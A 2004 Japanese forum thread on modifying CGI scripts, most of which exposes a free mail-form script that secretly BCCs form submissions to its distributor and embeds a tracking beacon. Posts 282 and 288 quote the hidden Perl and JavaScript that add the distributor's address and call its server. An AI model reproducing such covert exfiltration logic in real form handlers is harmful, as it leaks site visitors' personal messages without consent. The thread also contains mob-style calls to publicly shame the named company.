- 1 名前:sage mailto:sage [04/02/23 17:36 ID:???]
- #================================
# スレッドの説明
#================================
「スクリプトを改造したいけどやりかたわかんないよー」という人がいましたら
ここで聞いてください。ひょっとしたらアドバイス出来るかもしれません。
質問するときは以下の点に注意して書いて下さい
(1) そのスクリプトの内容と置いてある場所を明記する (txtファイルでUPすればなお良い)
(2) どんな風に改造して欲しいのか? (完成イメージHTMLを用意すればなお良し)
(3) 出来るだけ詳しく書くこと。少しは自分で考えること。できれば御礼も言ったほうが良い
※答えてくれないからといって逆ギレする厨はお断り
前スレ pc2.2ch.net/test/read.cgi/php/1063780103/
- 205 名前:204 mailto:sage [04/06/08 16:53 ID:???]
- スレ違いでした。
逝ってきます。
- 206 名前:未承諾広告※ ◆TWARamEjuA mailto:sage [04/06/08 20:27 ID:???]
- >>204
こういうのって初めて見たけれども力業で解析しているのね。ちょと感動した(w
- 207 名前:200 [04/06/09 04:21 ID:siBsh0Gf]
- >>200 ですがこのように
cgiでcgiを呼び出して使ってる方はいないでしょうか?
requireでもopen(<IN>, "**.cgi")でも駄目でした。
ヒントだけでもよいのでおねがいします。
- 208 名前:nobodyさん mailto:sage [04/06/09 04:41 ID:???]
- `
- 209 名前:nobodyさん mailto:sage [04/06/09 06:08 ID:???]
- >>207
スレ違い
>>1と>>79をよく読め
- 210 名前:nobodyさん [04/06/09 06:39 ID:siBsh0Gf]
- >>209
初心者の質問スレでは煽られたのみで
Perlコーディング初心者の質問スレでは改造スレで聞いたほうがいいと言われ
ここに来たのですが、
組み込みたい解析cgiと組み込み先の掲示板cgiをURLで紹介すればいいということでしょうか?
そちらのほうが人に手間をかけると思ったのですが・・・
- 211 名前:nobodyさん mailto:sage [04/06/09 06:50 ID:???]
- 簡単に教えてやる。
初めから他のCGIに組み込む前提で作られていないCGIを
お前がやろうとしている方法でそのまま使うことは無理。
- 212 名前:210 mailto:sage [04/06/09 06:57 ID:???]
- >>211
解析cgi配布先には、できるようなことが書いてあったのですが(具体法はなし)
複雑になってくると書いてあったので、相当難しいのでしょうかね・・・
ともかくレスありがとうございます。
あちこちに誘導されてあたかもマルチのようになってるので
こちらの質問は取り下げてPerl初心者スレで聞きます。
- 213 名前:208 mailto:sage [04/06/09 17:05 ID:???]
- >>207
もういないと思うけど、一応言っておくぞ。
お前は「ヒントだけでもよいのでおねがいします」って言ってたのでヒントを教えてやったのに私のことは無視ですか?
> 組み込みたい解析cgiと組み込み先の掲示板cgiを…(ry
まあなんだな、最初に丸投げスレで、テンプレに添って上記の依頼をしていたら、今頃君はHappyになっていただろう。
そんなに難しいわけでもないからな。
つーか、そこそこ勉強すればすぐできるレベルだから、これを機会に勉強すればいいぞ。
- 214 名前:nobodyさん [04/06/11 12:13 ID:nOPYLa/M]
- COMCHATのROM表示なのですが
@data(全参加者数)から$num(参加者数)を引けば良いとのことなんですが
どぉ弄れば良いのかさっぱり分かりません
何方かご教授お願いいたします。
- 215 名前:nobodyさん mailto:sage [04/06/11 12:32 ID:???]
- >>214 君には改造は無理のようだ。諦めれ。
- 216 名前:nobodyさん mailto:sage [04/06/11 19:20 ID:???]
- >>214
同じような改造依頼が過去何件もあった。
だが、いまだかつて改造ができたケースは無い。
なぜなら、ROMというのが(全参加者数)から(参加者数)を引けば良いといえないからである。
- 217 名前:214 mailto:sage [04/06/11 20:24 ID:???]
- >>216
アドバイスありがとうございます。
相当敷居が高そうですね;;
- 218 名前:nobodyさん mailto:sage [04/06/11 20:34 ID:???]
- >>217
おまいさん、ちょっと思い違いしているかもしれない。
改造が難しいとは言ってない。
改造するに値しないといっている。
なぜなら、ROMというのが(全参加者数)から(参加者数)を引けば良いといえないからである。
ROMというのはどういう状態なのかを定義できないからである。
>>217はROMというのはどういう状態か定義できるのか?
ならば道は開かれよう。
- 219 名前:nobodyさん mailto:sage [04/06/11 21:38 ID:???]
- とあるCGIスクリプト本文の中に、 送ってもらうフォーム内容を
スクリプト配布元のメールアドレスにもBCCで送信する構文が入っているものがありました。
そしてフォームHTML内にはスクリプト配布元のアクセス解析のGIF画像まで。
web-up.cside.biz/
ringoch.nekoruri.jp/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
alpha.ringoch.info/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
gateway.ringoch.info/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
ringoch.dayomon.net/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
alpha.www.td:81/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
ringoch.nekoruri.jp/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
alpha.ringoch.info/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
gateway.ringoch.info/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
ringoch.dayomon.net/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
alpha.www.td:81/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
- 220 名前:nobodyさん mailto:sage [04/06/11 21:43 ID:???]
- >>219
これって犯罪じゃないのか?
どこか目立つ板で祭りしようや。
- 221 名前:nobodyさん mailto:sage [04/06/11 21:48 ID:???]
- >>220
通信傍受だな
速報か
- 222 名前:こりゃ大変だ mailto:危機管理 [04/06/11 22:01 ID:???]
- 祭り会場決まったら教えてね
- 223 名前:nobodyさん mailto:age [04/06/11 22:01 ID:???]
- >>219
これはヲチ板とかニュー速でも祭った方がいいんじゃね?
- 224 名前:nobodyさん mailto:sage [04/06/11 22:07 ID:???]
- とりあえず証拠収集と解析をしようぜ。
まずはサイトを丸ごと保存して注意書きとかチェック。
他にも何か仕込まれていないか全スクリプトを落としてチェック。
- 225 名前:nobodyさん mailto:こりゃたいへん [04/06/11 22:10 ID:???]
- --------------------------------------------------------------------
214 名前:名無しさん@どーでもいいことだが。 メェル:sage 投稿日:04/06/10 20:42 ID:KO2sUTHI
自分の理想にぴったりかなったID/PASS請求用の高機能フォームCGI(フリーウェア)を発見し、
いそいそとダウンロードして「さぁ編集だ〜!」と喜び勇んでエディタで開いたところ…。
なんとスクリプト本文の中に、
読者様から送ってもらうフォーム内容(なまものに対する情熱を熱く語って頂く項目あり)を、
スクリプト配布元のメールアドレスにもBCCで送信する構文が入ってて( ゚д゚)ポカーソ
しかもそれだけじゃなく、フォームのHTML内には
スクリプト配布元のリンク監視用(?)
アクセス解析GIF透明画像(もちろん相手のサイトを直接呼び出し)が埋め込まれた。
つまり、読者様の与り知らないところで自サイトフォームへのアクセスがCGIの配布元に記録され、
しかも大きな声ではとてもとても言えないような密やかな萌えをCGIの配布元にまで
コソーリ送信するような仕組みになっていたというわけだ。
(((( ;゚Д゚))ガクガクブルブル
気持ち悪いなんていう理由でそういった部分を削除するのは規約違反だし、
元々そういう違反関連にかなりうるさいサイトらしく、
本気で晒し上げもしかねないような雰囲気だったのでやむなく使用を断念。
規約を読んでダウンロードしたのは自分なわけだし
機能の充実した素晴らしいフリーウェアだから少々の制約は致し方ないとはいえ、
あまりにも卑劣というか姑息だなと思ったので…。
大切な読者様に迷惑かかるのは一番イクナイ!し…。
--------------------------------------------------------------------
個人+商用+メールフォームCGI+CSVデータ蓄積
でヤフ検索すると出てくる。
- 226 名前:nobodyさん mailto:sage [04/06/11 22:31 ID:???]
- >>224
今保存ちう〜
> 個人情報の取り扱いについて
> ◆お客様の個人情報の取り扱いについて
> 弊社が収集した個人情報は、不適切な対応が行われないよう厳重に管理いたします。
> ◆お客様の個人情報の第三者への提供について
> お客様から提供を受けた個人情報は、お客様のご了承なしで第三者へ提供することはありません。
> 同様に、お客様のご了承なしで弊社の都合で勝手にDMを送付するといったこともありません。
> ◆スクリプトを不正に利用した方の個人情報の取り扱いについて
> 当サイト配布スクリプトを不正に利用していることが判明した方の個人情報に関しては、例外的に、ご本人様の承諾を得ることなく当サイトにて公開することがありますのでご了承下さい。
商用サイト向けに作られてるから
さぞ個人情報が集まった事だろうね。
- 227 名前:nobodyさん mailto:age [04/06/11 22:34 ID:???]
- 法律に反してまで不正に個人情報収集キタ━━━━(゚∀゚)━━━━ッ!!
- 228 名前:nobodyさん mailto:sage [04/06/11 22:36 ID:???]
- これ大問題だな
セキュリティー板にも誰か貼れよ
N速マダー
- 229 名前:nobodyさん mailto:sage [04/06/11 22:52 ID:???]
- N速マダー
って実は立てようとしたんだけど、俺のホストでは立てられなかった。
簡単に祭りになるかと思ったのにどこでも静かだね。
- 230 名前:nobodyさん mailto:age [04/06/11 22:55 ID:???]
- 【盗聴】web-up.cside.biz【個人情報詐取】
おいらも立てられないぞ。
- 231 名前:nobodyさん mailto:sage [04/06/11 23:00 ID:???]
- >>230
スレ立て依頼スレがあるよ
テンプレ作って、投下しれ
- 232 名前:230 mailto:age [04/06/11 23:21 ID:???]
- スレ起て規制中だからテンプレまで考えてなかった_| ̄|○スマソ
誰かヨロシク。
- 233 名前:nobodyさん mailto:sage [04/06/11 23:32 ID:???]
- ヌー速はスレ保持数が極端に少なくなってるから
よっぽど捻ってスレ立てないと即落ちだぞ。
- 234 名前:nobodyさん mailto:sage [04/06/11 23:36 ID:???]
- ヌー速でなくても、Web系の板にとりあえず立てたらどうか?
とりあえず、世のサイト管理人に知らせたいもんだ。
- 235 名前:nobodyさん mailto:sage [04/06/11 23:42 ID:???]
- ex5.2ch.net/net/
ネトヲチ板とか
- 236 名前:nobodyさん mailto:sage [04/06/11 23:44 ID:???]
- >>235
そこも立てられなかった…誰かヨロ
とりあえず>>219がテンプラでどーだ
- 237 名前:nobodyさん mailto:sage [04/06/11 23:46 ID:???]
- ヲチ板に立てるなら一応hは抜いておいたらどうだろう。
相手が既に気付いてるなら夜逃げ段階かもしれないけど。
- 238 名前:nobodyさん mailto:sage [04/06/11 23:49 ID:???]
- 【盗聴】web-up.cside.biz【個人情報詐取】
CGIスクリプト本文の中に、 送ってもらうフォーム内容を
スクリプト配布元のメールアドレスにもBCCで送信する構文が入っているものがありました。
そしてフォームHTML内にはスクリプト配布元のアクセス解析のGIF画像まで。
ttp://web-up.cside.biz/
ringoch.nekoruri.jp/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
alpha.ringoch.info/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
gateway.ringoch.info/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
ringoch.dayomon.net/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
alpha.www.td:81/3d496c04-09fb-8536-8418-96a5739715a0/f708636f-1ed4-4195-bd79-f71f86f8a4bf/bcc.png
ringoch.nekoruri.jp/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
alpha.ringoch.info/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
gateway.ringoch.info/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
ringoch.dayomon.net/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
alpha.www.td:81/3d496c04-09fb-8536-8418-96a5739715a0/5ca9f262-572d-4683-8399-4161bc7b58bd/img.png
こんな感じか。
>>2に画像のURLでもいいね。誰かヨロ
- 239 名前:nobodyさん mailto:sage [04/06/11 23:51 ID:???]
- この板は見てないので住民の傾向は分からんが
一応参考までに。
「痛いニュース速報+」
news16.2ch.net/dqnplus/
- 240 名前:nobodyさん mailto:たてた [04/06/11 23:57 ID:???]
- 【盗聴】web-up.cside.biz【個人情報詐取】
ex5.2ch.net/test/read.cgi/net/1086965756/l50
たてたよー
- 241 名前:nobodyさん [04/06/11 23:59 ID:zWex4Tqd]
- 226nobodyさんsage04/06/11 22:31 ID:???>>224
今保存ちう〜
> 個人情報の取り扱いについて
> ◆お客様の個人情報の取り扱いについて
> 弊社が収集した個人情報は、不適切な対応が行われないよう厳重に管理いたします。
> ◆お客様の個人情報の第三者への提供について
> お客様から提供を受けた個人情報は、お客様のご了承なしで第三者へ提供することはありません。
> 同様に、お客様のご了承なしで弊社の都合で勝手にDMを送付するといったこともありません。
> ◆スクリプトを不正に利用した方の個人情報の取り扱いについて
> 当サイト配布スクリプトを不正に利用していることが判明した方の個人情報に関しては、例外的に、ご本人様の承諾を得ることなく当サイトにて公開することがありますのでご了承下さい。
商用サイト向けに作られてるから
さぞ個人情報が集まった事だろうね。
227nobodyさんage04/06/11 22:34 ID:???法律に反してまで不正に個人情報収集キタ━━━━(゚∀゚)━━━━ッ!!
- 242 名前:未承諾広告※ ◆TWARamEjuA mailto:sage [04/06/12 00:00 ID:???]
- 実は痛+のキャップ持ってたりして(w
- 243 名前:nobodyさん mailto:sage [04/06/12 00:02 ID:???]
- >>240
乙
- 244 名前:未承諾広告※ ◆TWARamEjuA mailto:sage [04/06/12 00:09 ID:???]
- Done.
【盗聴】web-up.cside.biz【個人情報詐取】
news16.2ch.net/test/read.cgi/dqnplus/1086966502/l50
- 245 名前:nobodyさん mailto:sage [04/06/12 00:25 ID:???]
- >>244
面白じゃなくて、ヌー速に立ててよ
- 246 名前:未承諾広告※ ◆TWARamEjuA mailto:sage [04/06/12 00:26 ID:???]
- >>245
ν速は怖いので却下(w
- 247 名前:nobodyさん mailto:sage [04/06/12 00:28 ID:???]
- >>246
一番人がいるじゃん
- 248 名前:未承諾広告※ ◆TWARamEjuA mailto:sage [04/06/12 00:31 ID:???]
- >>247
だから怖かったりして(w
ってことで、mesh.ad.jp の人よろですー(w
(実は対策中@スレ立て規制ルーチン)
- 249 名前:nobodyさん mailto:age [04/06/12 00:39 ID:???]
- Web-UPへようこそ!
突然ですが、おめでとうございます!
あなたはオレオレ詐欺を成功させる為の絶好の機会に恵まれました!この機会に、ぜひあなたの常識が正しいかどうかを確かめてみて下さい。
さっそくですが、あなたの会社ではコンピュータやプログラムが出来る仕事を人間がやっているということはありませんか?それは本当に実在の人間でないと出来ない仕事ですか?
零細企業ほど業務のIT化・自動化を進めて、貴重な人的資源を有効に活用する必要があります。オレオレ詐欺運営業務のほとんどは、コンピュータに自動でやらせることが出来るのですから!
- 250 名前:nobodyさん [04/06/12 01:34 ID:XcpBcCfn]
- 【盗聴】web-up.cside.biz【個人情報詐取】
news12.2ch.net/test/read.cgi/news/1086971546/
- 251 名前:nobodyさん [04/06/12 01:38 ID:S59QSIAd]
- キタ━━━━━━(゚∀゚)━━━━━━ !!
- 252 名前:nobodyさん [04/06/12 01:38 ID:F7bl5wsk]
- キタ━━━━(゚∀゚)━━━━ッ!!
- 253 名前:nobodyさん mailto:sage [04/06/12 01:39 ID:???]
- (`・ω・´)シャキーン
- 254 名前:nobodyさん mailto:sage [04/06/12 01:41 ID:???]
- 記念ぱぴぽ
- 255 名前:nobodyさん mailto:sage [04/06/12 01:50 ID:???]
- 【盗聴】web-up.cside.biz【個人情報詐取】
ν速 news12.2ch.net/test/read.cgi/news/1086971546/
ヲチ ex5.2ch.net/test/read.cgi/net/1086965756/
痛+ news16.2ch.net/test/read.cgi/dqnplus/1086966502/
- 256 名前:nobodyさん mailto:sage [04/06/12 01:51 ID:???]
- ニュー速から来ました
c⌒っ*゚д゚)っφ 記念カキコ
- 257 名前:nobodyさん mailto:sage [04/06/12 02:02 ID:???]
- おめでとう。勝利は目前だ。
祈念カキコ。
- 258 名前:うんこぶりぶりまん [04/06/12 02:03 ID:2GlvRme6]
- 祭りだ下記子
- 259 名前:nobodyさん [04/06/12 02:11 ID:09i6j9GU]
- ∩( ・ω・)∩祭りばんじゃーい
- 260 名前:nobodyさん mailto:sage [04/06/12 02:14 ID:???]
- 【盗聴】web-up.cside.biz【個人情報詐取】
pc5.2ch.net/test/read.cgi/sec/1086973725/
- 261 名前:nobodyさん mailto:sage [04/06/12 02:16 ID:???]
- | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
| 祭り? |
|________|
∧ ∧|| ω
(* ̄∀ ̄)(・|>
_|U_|//
\___ノ
...⊂ ̄U U ̄⊃
⊂__ジョー__⊃
- 262 名前:nobodyさん mailto:sage [04/06/12 02:18 ID:???]
- >>261
まつりだ
- 263 名前:nobodyさん mailto:sage [04/06/12 02:23 ID:???]
- ドンドド゙ッド、ドッドドッド、ドンドド゙ッド、ドッドドッド、
モリアガッテマイリマシター!!!!
∧ ∧ ,,──,−、 ♪
(,,゚Д゚) / (: :( ) ))
|つ/つ `ー─``ー'
〜| | ┣━━┫┨
U U ┠┤ ┣┫
- 264 名前:nobodyさん [04/06/12 02:26 ID:wopb/Mb3]
- >なんとスクリプト本文の中に、
>読者様から送ってもらうフォーム内容を、
>スクリプト配布元のメールアドレスにもBCCで送信する構文が入ってて( ゚д゚)ポカーソ
>しかもそれだけじゃなく、フォームのHTML内には
>スクリプト配布元のリンク監視用(?)
>アクセス解析GIF透明画像(もちろん相手のサイトを直接呼び出し)が埋め込まれた。
>つまり、読者様の与り知らないところで自サイトフォームへのアクセスがCGIの配布元に記録され、
>しかも大きな声ではとてもとても言えないような密やかな萌えをCGIの配布元にまで
>コソーリ送信するような仕組みになっていたというわけだ。
>(((( ;゚Д゚))ガクガクブルブル
これでもわからない奴はry
- 265 名前:nobodyさん [04/06/12 02:28 ID:ePpV/3zG]
- ν速から来たよ、
Website Explorerで落としてるんだけど重いなここのサイト。
- 266 名前:nobodyさん mailto:sage [04/06/12 02:29 ID:???]
- とりあえず最新確認に関連スレ一覧置いていきますね
ttp://www.ruitomo.com/~gulab/s.cgi?k=web-up&o=r
あと立つならWeb制作とネットサービスあたりなのかな。
- 267 名前:nobodyさん mailto:sage [04/06/12 02:32 ID:???]
- 該当部分のソースキボン
頭沸いてるんかコイツ
- 268 名前:nobodyさん mailto:sage [04/06/12 02:36 ID:???]
- 金に目がくらんでトチ狂って書いたってとこ?
- 269 名前:nobodyさん mailto:sage [04/06/12 02:37 ID:???]
- >>266
分かりやすくてイイ!
- 270 名前:nobodyさん mailto:sage [04/06/12 02:37 ID:???]
- >265
それはshtmlも落とせるのかな?
なんかshtmlだらけで満足に落とせないとどこかのスレで見たよ
- 271 名前:nobodyさん mailto:sage [04/06/12 02:38 ID:???]
- 一応これ置いときますね。
68 :名無しさん@ゴーゴーゴーゴー! :04/06/12 02:09 ID:/o6BW1Gu
Num-Mailしか見てないけど、メールが抜かれるのって
著作権表示を消した時と、一番最初にメール送信した時だけだよな?
$temp何とかってファイルを空にすればまた抜かれるけど
メールを送信するたびに抜かれるわけじゃないよな?
- 272 名前:nobodyさん mailto:sage [04/06/12 02:39 ID:???]
- 200人訪問中ということは、それだけ2ちゃんねらーがいるということですね
- 273 名前:nobodyさん mailto:sage [04/06/12 02:42 ID:???]
- GETHTMLで落とした
- 274 名前:nobodyさん mailto:sage [04/06/12 02:42 ID:???]
- >>271
つまりどのサイトでスクリプト使われてるか把握するためのものなのね
って全然言い訳にもならん。逮捕だ逮捕
- 275 名前:nobodyさん mailto:sage [04/06/12 02:44 ID:???]
- >>274
それだけならいいが
スクリプト使って送信したメールがサクーシャにも送信
- 276 名前:nobodyさん mailto:sage [04/06/12 02:45 ID:???]
- >>270
あ、それ自分だ。
うまく落とせてないから、他の人に頑張って貰いたいんだが…
落とすとき30分も解析にかかった。
- 277 名前:274 mailto:sage [04/06/12 02:52 ID:???]
- >>275
いや、だから一回目に送るメールってのは大概運営者だから
そのアドレスだけを抜き出そうという魂胆でそ>>271読む限りでは
おれも今からソースみてみるけど
- 278 名前:nobodyさん mailto:sage [04/06/12 02:53 ID:???]
- ソース公開してるんだから、責任はそんなものas isで使うことを
承諾して使ってるユーザーにあるんだろ
- 279 名前:nobodyさん mailto:sage [04/06/12 02:57 ID:???]
- ■免責事項
8. 本スクリプトの不正利用防止・設置状況把握を目的として、本スクリプトから設置先サーバーの情報を収集することがありますが、利用者はこれに同意したものとします。
補足
ついでに個人情報も収集します
- 280 名前:nobodyさん mailto:sage [04/06/12 02:57 ID:???]
- 光臨?
と煽っておく
- 281 名前:nobodyさん mailto:sage [04/06/12 02:59 ID:???]
- > ■免責事項
> 8. 本スクリプトの不正利用防止・設置状況把握を目的として、
> 本スクリプトから設置先サーバーの情報を収集することがありますが、
> 利用者はこれに同意したものとします。
これはBCCで情報収集の言い訳として成り立つのか?というところだな。
- 282 名前:nobodyさん mailto:sage [04/06/12 03:00 ID:???]
- 該当部分
(1)
if($footer !~ /Web-UP/ or $ver !~ /Num-Mail v1.04/)
{ $bcc = 'bad@web-up.cside.biz'; $bad = 1; }
(2)
if(!open(TEMP,"$temp_file")){ &error('一時ファイルが開けませんでした'); }
$TEMP = <TEMP>;
close(TEMP);
if($TEMP eq ''){
my $H = $ENV{'HTTP_HOST'};
my $S = $ENV{'SCRIPT_NAME'};
$PAGE = <<EOF;
<script type="text/javascript" language="JavaScript">
<!--
(略。IMG使ってアク解仕込んでる)
// -->
</script>
<noscript>
<img src="web-up.cside.biz/cgi/use/ac.cgi?pg=$H$S" width=1 height=1 border=0>
</noscript>
EOF
$bcc = 'start@web-up.cside.biz;'.$bcc;
}
#(2)は「送信ボタン2度押し検出」だそうだ
#「一時ファイル」に最後に送信したUAやホストを記録してる
- 283 名前:nobodyさん mailto:sage [04/06/12 03:03 ID:???]
- ご丁寧に綺麗なソースでこんなことするとは
頭マジいかれてるな
- 284 名前:nobodyさん mailto:sage [04/06/12 03:07 ID:???]
- >>281
法律違反行為ならそんなもん無効だわな。
- 285 名前:nobodyさん mailto:sage [04/06/12 03:13 ID:???]
- 弊社のご案内
atpc.cside9.com/d.c.p/goannnai.htm
- 286 名前:nobodyさん mailto:sage [04/06/12 03:16 ID:???]
- >>285
WEBクリエイター3級
とかあるんだ。初耳。
- 287 名前:nobodyさん mailto:sage [04/06/12 03:22 ID:???]
- せめてスクリプトタグの内容暗号化して盗聴用鯖も一見無関係のところにしておきゃよかったのに。
どっちにしても、すぐばれるだろうが。
- 288 名前:nobodyさん mailto:sage [04/06/12 03:27 ID:???]
- document.write("<img src='web-up.cside.biz/cgi/use/ac.cgi?");
document.write("pg="+pg+a+"pf="+pf+"lng="+lng+"swh="+swh+"cd="+cd+"pd="+pd+"rf="+rf);
document.write("' width=1 height=1 border=0>");
何やってんだ?
- 289 名前:nobodyさん mailto:sage [04/06/12 03:30 ID:???]
- >>282
N速では(2)の処理は最初の一回だけって話になってるけどどうなの?
>>288
アクセス解析という噂
- 290 名前:nobodyさん mailto:sage [04/06/12 03:32 ID:???]
- びっくりしますた
- 291 名前:nobodyさん mailto: [04/06/12 03:32 ID:???]
- おい、もう材料ねえのか?
ヌー速もやる気なくなってるぞ
- 292 名前:nobodyさん mailto:sage [04/06/12 03:33 ID:???]
- 夜中だからな。明日またやろうぜ
- 293 名前:nobodyさん mailto:sage [04/06/12 03:33 ID:???]
- >>291
やる気も何もさすがに時間が時間だし。
まだ明日以降あるでしょ。
- 294 名前:nobodyさん mailto:sage [04/06/12 03:34 ID:???]
- 明日またスレ立てれば桶
- 295 名前:nobodyさん mailto:sage [04/06/12 03:35 ID:???]
- >>289
最初の1回目だけ。
$temp_fileを捨てると、また1度だけ送られる
- 296 名前:nobodyさん mailto:sage [04/06/12 03:38 ID:???]
- 最初の一回だけだから出歯亀送信してもいいとはいえないんだよな?
しかも今回は
“最初の一回だけ送信”דcgi設置した件数”
だよな
- 297 名前:nobodyさん mailto:sage [04/06/12 03:38 ID:???]
- >>295
眠くてスクリプト見てないけど
そのtempは何?
- 298 名前:nobodyさん mailto:sage [04/06/12 03:39 ID:???]
- >>295
dくす
- 299 名前:nobodyさん mailto:sage [04/06/12 03:44 ID:???]
- >}else{
> &error('<b>スクリプト利用規約違反行為を検出しました</b><br><a href="mailto:info@web-up.cside.biz">こちら</a>からご連絡下さい');
>}
( ´,_ゝ`)プッ
- 300 名前:nobodyさん mailto:sage [04/06/12 03:46 ID:???]
- このcgiを利用したサイトが不正利用すると、関係ない第三者の個人情報も
web-upに送られるという極悪仕様らしいね
- 301 名前:nobodyさん mailto:sage [04/06/12 03:49 ID:???]
- >>300
不正使用しなくても、一回目に情報が送られる。
- 302 名前:nobodyさん mailto:sage [04/06/12 03:52 ID:???]
- >>301
一通目は普通管理人だから問題ないけど、(いや、あるけど)
二通目以降の本番使用での訪問者による送信でも、
サイト管理者が不正使用なら訪問者のメールも読まれてしまう
という意味でしょうが
- 303 名前:295 mailto:sage [04/06/12 03:55 ID:???]
- >>297
最後に送ったメールの送信者やら送信時刻やらを保存してるファイル。
送信ボタン2度押しによる2重送信を防ぐために、
1.$temp_fileに記録した時刻から5秒以内に
2.送信者アドレスとUAとホストが同じメールを送ろうとした
場合には、2通目を送らないようにする。
このファイルが空白の場合に、BCCに余計なアドレスが追加される。
- 304 名前:nobodyさん mailto:sage [04/06/12 03:56 ID:???]
- この程度のスクリプト、どこに有料にするほどの機能があろうか
- 305 名前:nobodyさん mailto:sage [04/06/12 03:57 ID:???]
- 入力必須項目をいくつでも設定できます。
入力内容が同一でないとエラーとする項目をいくつでも設定できます。
半角数字のみ入力許可とする項目、半角英数字のみ入力許可とする項目をいくつでも設定できます。
7桁郵便番号(ハイフン付き)の書式チェックをする項目をいくつでも設定できます。
カタカナと空白のみを入力許可とする項目をいくつでも設定できます。
加入電話番号(ハイフン付き)の書式チェックをする項目をいくつでも設定できます。
携帯電話番号(ハイフン付き)の書式チェックをする項目をいくつでも設定できます。
その他の電話番号(ハイフン付き)の書式チェックをする項目をいくつでも設定できます。
日付の書式チェックをする項目をいくつでも設定できます。
日付の書式チェックをする項目に存在しない日付が入力された場合エラーとなります(うるう年にも対応)。
入力禁止とする項目をいくつでも設定できますので、フリーメールアドレスからの送信などを事前に防止できます。
メールアドレス・ホームページアドレスを正規表現を使って厳密に書式チェックします。これにより、せっかくメールを送ってくれた送信者の方が運悪くメールアドレスを間違って記入してしまい連絡が取れなくなるというトラブルを大幅に減らすことができます。
( ´,_ゝ`)プッ
要するに
・入力情報チェック機能
だろが
|
 |
